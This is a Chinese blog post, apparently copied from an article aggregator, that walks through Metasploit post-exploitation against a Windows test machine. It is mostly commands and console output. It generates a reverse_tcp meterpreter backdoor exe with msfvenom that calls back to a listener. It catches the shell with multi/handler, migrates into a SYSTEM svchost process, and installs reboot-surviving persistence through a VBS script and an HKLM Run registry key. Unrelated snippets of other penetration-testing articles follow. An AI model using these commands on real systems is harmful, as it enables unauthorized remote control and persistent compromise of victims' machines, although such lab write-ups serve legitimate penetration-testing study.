2. 程式人生 > >msf後滲透

msf後滲透

阿新 發佈:2018-04-14
rec let pen AR zha bsp complete arc payload

生成exe後門

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.ex

傳到測試機執行後得到反彈shell

msfconsole

msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.31.131
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.31.131:4444
[*] Sending stage (179779 bytes) to 192.168.31.248
[*] Meterpreter session 1 opened (192.168.31.131:4444 -> 192.168.31.248:49313) at 2018-04-13 23:05:37 +0800

meterpreter >

meterpreter > getpid
Current pid: 4584
meterpreter > getuid //獲取當前用戶身份
Server username: ihoney-PC\Administrator
meterpreter >

meterpreter > ps //查看當前測試機系統進程

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----

564 456 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe

meterpreter > migrate 564 //遷移當前會話進程到系統進程,這樣即使被結束exe後門仍然可以使用會話shell
[*] Migrating from 4456 to 564...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 564
meterpreter > getuid //遷移成功後得到system用戶權限
Server username: NT AUTHORITY\SYSTEM

meterpreter > run persistence -X -i 60 -p 4444 -r 192.168.31.131 //真正的後滲透,在系統重啟後仍然可以得到shell

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /Users/zhangpeng/.msf4/logs/persistence/IHONEY-PC_20180413.2519/IHONEY-PC_20180413.2519.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.31.131 LPORT=4444
[*] Persistent agent script is 99640 bytes long
[+] Persistent Script written to C:\Windows\TEMP\vkHZiX.vbs //寫了一個vbs腳本到C:\Windows\TEMP\目錄,系統重啟自動運行
[*] Executing script C:\Windows\TEMP\vkHZiX.vbs
[+] Agent executed with PID 4872
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PgjqHCWqb
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PgjqHCWqb

meterpreter > exit //退出會話並重啟測試機
[*] Shutting down Meterpreter...

[*] 192.168.31.248 - Meterpreter session 3 closed. Reason: User exit
msf exploit(multi/handler) >

此時重啟測試機後,重新得到會話

msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.31.131:4444
[*] Sending stage (179779 bytes) to 192.168.31.248
[*] Meterpreter session 4 opened (192.168.31.131:4444 -> 192.168.31.248:49302) at 2018-04-13 23:26:31 +0800

meterpreter >

技術分享圖片

msf後滲透

相關推薦

msf滲透

rec let pen AR zha bsp complete arc payload 生成exe後門 p.p1 { margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; color: #000000; backgro

iOS macOS的滲透利用工具:EggShell

launch ont front 驗證 itunes roo plan easy 放下 EggShell是一款基於Python編寫的iOS和macOS的後滲透利用工具。它有點類似於metasploit,我們可以用它來創建payload建立偵聽。此外,在反彈回的session

phpSploit滲透利用框架介紹

系統 文本編輯 交互式 $_server 一個 數據 保存 之間 插件 今天在freebuf 上看到有一篇介紹PhpSploit的遠程控制框架的文章覺得不錯,就把文章超過來了。方便以後自己查找。phpsploit可以幫助攻擊者在客戶端與Web服務器端之間建立隱蔽性極強的交互

Metasploit Framework(8)滲透測試(一)

文章的格式也許不是很好看,也沒有什麼合理的順序 完全是想到什麼寫一些什麼,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和槓精們請繞道   使用場景: Kali機器IP:192.168.163.132 WindowsXP機器IP:192.168.163.134  

滲透測試神器Empire的使用--持續更新

0X00前言 Empire是一個PowerShell後期漏洞利用代理工具同時也是一款很強大的後滲透測神器,它建立在密碼學、安全通訊和靈活的架構之上。Empire實現了無需powershell.exe就可執行PowerShell代理的功能。快速部署後期漏洞利用模組,從鍵盤記錄器到Mimik

windows 滲透攻擊

---恢復內容開始--- 從開啟的meterpreter shell 開啟 cmd  在cmd中執行wmic就可以得到系統相關資訊   win10一些提權操作我都失敗了 在win7中一下是我成功提權使用的模組 exploit/windows/local/bypassuac 20

滲透攻擊

許可權提升 許可權提升簡稱<提權>,是一種通過各種辦法和漏洞,提高自己在伺服器中的許可權,以便控制全部資源的方法。比如在Windows中就是獲得System的許可權,在Linux就是獲得root的許可權 一般提權的方法有 系統漏洞提權 資料庫提權

23.通過MS17_010來學習msf滲透的利用

  Metersploit 集成了滲透階段的全部利用,從漏洞探測,到漏洞利用,最後到後滲透階段。本次部落格主要拋磚引玉,通過對MS17_010漏洞的復現,來學習Metasploit。 漏洞環境:       靶機:windows 7 (192.

滲透過程中基於windows的提權操作

前言 當你在愛害者的機器上執行一些操作時,發現有一些操作被拒絕執行,為了獲得受害機器的完全許可權,你需要繞過限制,獲取本來沒有的一些許可權,這些許可權可以用來刪除檔案,檢視私有資訊,或者安裝特殊程式,比如病毒。Metasploit有很多種後滲透方法,可以用於對目標機器的

Metasploit入門系列(十一)——滲透測試

老規矩,今天我們的後滲透測試內容也不來自於任何視訊或教程,自己挖! 其實如果你去百度後滲透測試的話,應該也搜不到什麼你想要的內容。給大家提一個概念:PTES(滲透測試執行標準),全稱"The Penetration Testing Execution Standard",也算是滲透工作行業的一個標準,Pos

一次小小的內網滲透實戰(無滲透階段)

時隔這麼久,讀書也讀了,考試也考完了。開始接受別人給我一次實戰的任務。--記一次學習不久的實戰,以後看到可能會笑自己輕噴有問題可以留言給我。謝謝這次選在了離我家比較近的網咖。每次上網完回家身上都是一股煙味,點比較煩。所以才會想來這裡。讓我們開始吧1、滲透環境配置需要材料有: 

滲透之meterpreter攻略

系統命令 基本系統命令 sessions #sessions –h 檢視幫助 sessions -i <ID值> #進入會話 -k 殺死會話 background #將當前會話放置後臺 run #執行已有的模組,輸入run後按兩下tab,列出已有的指令碼 inf

Metasploit的簡單木馬免殺技術及滲透面臨的問題

一. 配置ngrok準備內網穿透內網穿透的必要性和原理就不用說了,直接說操作。首先到ngrok官網去註冊一個號,國內也有一個sunny ngrok,但是我用了幾次全失敗了,所以推薦國外的,網址是:https://ngrok.com/。我註冊的時候面臨驗證碼刷不出來,所以建議選

滲透之——Metasploit自定義收集登入憑證的滲透模組

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86415478 這裡,我們以攻擊Foxmail 6.5為例,將嘗試對登入憑證進行解密,然後將它儲存到資料庫。 注意:執行這個指令碼的前提是我們已經經過一系列的滲透拿下了目

滲透之——Metasploit自定義讓磁碟失效的滲透模組

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86383118 一個可以禁用Windows 作業系統上的指定硬碟的程式,這裡我們將指令碼命名為:disable_drives_by_binghe.rb。 具體內容如下:

linux 滲透測試

1. SSH滲透技巧 1.1 ssh 臨時後門 入侵得到SHELL後,對方防火牆沒限制,想快速開放一個可以訪問的SSH埠肉雞上執行 myles@localhost:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su

滲透攻防工具篇-滲透階段的Meterpreter

文章作者  zusheng 文章來源  i春秋原創獎勵計劃 時間        2016年8月23日 14:38:43 前言熟悉Metasploit的應該對Meterpreter不陌生,作為後滲透階段的利器,其強大之處可想而知,那麼本篇文章就帶大家來學習一下Meterpre

Empire – PowerShell 滲透攻擊框架

0x01 簡介 Empire是一個後滲透攻擊框架。它是一個純粹的PowerShell代理,具有加密安全通訊和靈活架構的附加功能。Empire具有在不需要PowerShell.exe的情況下執行PowerShell代理的方法。它可以迅速採用可後期利用的模組,涵蓋範圍廣泛,從鍵盤記錄器到mimikatz等。這個框

Metasploit簡單使用——滲透階段

在上文中我們復現了永恆之藍漏洞,這裡我們學習一下利用msf簡單的後滲透階段的知識/   一、meterperter常用命令 sysinfo #檢視目標主機系統資訊 run scraper #檢視目標主機詳細資訊 run hashdump #匯出

MSF魔鬼訓練營-3.5.4Nmap與滲透測試數據庫

scan p s pbe service mmu php imp line report MSF中可以直接使用db_nmap,它是namp的一個封裝與NMAP用法完全一致。其執行結果會自動導入至數據庫中。 當然也可以在使用 nmap 的 -oX參數輸出一個XML格式的文件。